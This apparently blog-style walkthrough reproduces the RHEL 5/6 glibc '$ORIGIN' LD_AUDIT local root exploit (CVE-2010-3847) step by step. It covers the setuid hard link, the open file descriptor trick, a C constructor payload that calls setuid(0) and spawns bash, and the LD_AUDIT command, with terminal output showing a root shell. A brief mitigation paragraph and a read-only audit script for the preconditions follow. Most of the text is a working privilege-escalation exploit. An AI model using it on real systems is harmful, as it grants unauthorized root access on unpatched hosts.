Affected systems: RHEL 5 through RHEL 6 (before the glibc errata; this is the ld.so "$ORIGIN in LD_AUDIT" bug, CVE-2010-3847).
The exploit abuses a file's setuid bit: a hard link to a root-owned setuid binary is placed in a directory the attacker controls, and the dynamic loader is then tricked, via LD_AUDIT="$ORIGIN", into loading an attacker-supplied shared object with the binary's root privileges. The steps are below.
First, log in to the system and create an arbitrary directory under /tmp:

    [test@linux-6-node-1 tmp]$ ll -d /tmp/
    drwxrwxrwt. 6 root root 4096 Sep 24 20:06 /tmp/
    [test@linux-6-node-1 tmp]$ mkdir exploit
    [test@linux-6-node-1 tmp]$ ll -d exploit
    drwxrwxr-x. 2 gl gl 4096 Sep 24 20:31 exploit
Hard-link a setuid command into the new directory. A hard link is used because it keeps the root-owned setuid file itself while giving it a path under the attacker's directory (a symlink would not do: ld.so resolves the real path). This only works if /tmp is on the same filesystem as /bin; hard links cannot cross filesystems.

    [test@linux-6-node-1 tmp]$ ll /bin/ping
    -rwsr-xr-x. 2 root root 38200 Jul 24 2015 /bin/ping
    [test@linux-6-node-1 tmp]$ ln /bin/ping /tmp/exploit/target
    [test@linux-6-node-1 tmp]$ ll !$
    ll /tmp/exploit/target
    -rwsr-xr-x. 2 root root 38200 Jul 24 2015 /tmp/exploit/target
Hold the file open. Opening it on file descriptor 3 keeps the inode alive (and executable through /proc) even after its directory entry is removed in the next step:

    [test@linux-6-node-1 tmp]$ exec 3< /tmp/exploit/target
    [test@linux-6-node-1 tmp]$ ll /proc/$$/fd/3
    lr-x------. 1 gl gl 64 Sep 24 20:17 /proc/44429/fd/3 -> /tmp/exploit/target
Delete the link and its directory. The open descriptor still points at the binary, now marked "(deleted)"; ld.so later derives $ORIGIN from this link target by stripping the last path component, which yields /tmp/exploit:

    [test@linux-6-node-1 tmp]$ rm -fr /tmp/exploit/
    [test@linux-6-node-1 tmp]$ ll /proc/$$/fd/3
    lr-x------. 1 gl gl 64 Sep 24 20:17 /proc/44429/fd/3 -> /tmp/exploit/target (deleted)
Write the C payload for the privilege escalation. The constructor runs as soon as the shared object is mapped, before ld.so checks whether it is a valid audit library; setuid(0) makes the real uid root as well, so the spawned bash does not drop privileges:

    [test@linux-6-node-1 tmp]$ vim payload.c
    #include <stdlib.h>
    #include <unistd.h>

    /* Runs at load time, with the setuid binary's effective uid 0. */
    void __attribute__((constructor)) init(void)
    {
        setuid(0);             /* make the real uid 0 too, so bash keeps root */
        system("/bin/bash");
    }
Compile it as a shared object. The output path must be exactly /tmp/exploit, the value that $ORIGIN will expand to (the directory of that name was removed above, so the name is now free for a file):

    [test@linux-6-node-1 tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
    [test@linux-6-node-1 tmp]$ ll /tmp/exploit
    -rwxrwxr-x. 1 gl gl 6020 Sep 24 20:25 /tmp/exploit
Run it to escalate. The \$ is escaped so that the literal string $ORIGIN reaches ld.so, which on a vulnerable glibc expands it for the setuid program to /tmp/exploit and loads that file as an audit library. The constructor spawns the root shell; the "cannot be loaded as audit interface" error and ping's usage text are printed once that shell exits and ld.so continues:

    [test@linux-6-node-1 tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
    Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
                [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
                [-M mtu discovery hint] [-S sndbuf]
                [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
    [root@linux-6-node-1 ~]#
The prompt has changed from $ to #; everyone knows what # means. Confirm with whoami:

    [root@linux-6-node-1 ~]# whoami
    root

Privilege escalation succeeded.
This is not a major worry: it needs a local login, a world-writable directory on the same filesystem as a setuid-root binary, and an unpatched glibc. Apply the glibc errata, keep /tmp on its own filesystem (which also defeats the hard-link step), and basic hygiene avoids this situation.
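To turn the preconditions above into something checkable, here is an added read-only audit script. It is not part of the original post: it shows how ld.so derives $ORIGIN from the /proc/self/exe link (the "(deleted)" trick from the procedure), whether the kernel blocks hard links to files you do not own, and which setuid-root files share a filesystem with a writable directory. It assumes Linux with GNU or busybox stat, df and find; the default directory /tmp and the script name audit.sh are hypothetical.

```shell
#!/bin/sh
# Added example, not the original post's code: audit the preconditions that the
# hard-link + LD_AUDIT="$ORIGIN" procedure relies on. Assumes Linux with
# stat/df/find; "audit.sh" and the default dir /tmp are placeholders.

# ld.so computes $ORIGIN from readlink(/proc/self/exe) by cutting at the last
# '/'. For a binary run through an open fd after its directory was removed the
# link reads "/tmp/exploit/target (deleted)", so $ORIGIN becomes /tmp/exploit,
# the path the attacker then recreates as a shared object.
origin_of_exe_link() {
    case "$1" in
        */*) printf '%s\n' "${1%/*}" ;;
        *)   printf '%s\n' "." ;;
    esac
}

# Prints 1 when fs.protected_hardlinks is on (Linux >= 3.6), which forbids an
# unprivileged user from hard-linking a root-owned setuid file; prints 0
# otherwise, including on kernels that predate the knob (RHEL 5/6 era).
hardlinks_protected() {
    if [ -r /proc/sys/fs/protected_hardlinks ]; then
        cat /proc/sys/fs/protected_hardlinks
    else
        echo 0
    fi
}

# Hard links cannot cross filesystems: the link step only works when the
# writable directory and the setuid target are on the same device.
same_device() {
    [ "$(stat -c %d "$1")" = "$(stat -c %d "$2")" ]
}

# Mount point containing a path (POSIX df -P, 6th column of the second line).
mount_point_of() {
    df -P "$1" | awk 'NR==2 { print $6 }'
}

# Root-owned setuid files reachable by hard link from a writable directory:
# everything on that directory's filesystem (-xdev keeps find on one device).
setuid_root_linkable_from() {
    find "$(mount_point_of "$1")" -xdev -type f -user root -perm -4000 2>/dev/null
}

audit() {
    dir=${1:-/tmp}
    echo "fs.protected_hardlinks: $(hardlinks_protected)"
    echo "glibc: $(ldd --version 2>/dev/null | head -n1)"
    echo "example: $ORIGIN for '/tmp/exploit/target (deleted)' is $(origin_of_exe_link '/tmp/exploit/target (deleted)')"
    echo "setuid-root files on the filesystem holding $dir:"
    setuid_root_linkable_from "$dir"
}

# Usage: sh audit.sh [writable-dir]   (runs only when invoked under that name)
if [ "${0##*/}" = "audit.sh" ]; then
    audit "$@"
fi
```

If the list of setuid-root files is non-empty and fs.protected_hardlinks reports 0, the first two steps of the procedure are possible on that host; whether the last step works then depends only on the glibc build, so compare the printed version against your distribution's errata rather than trusting a generic cutoff.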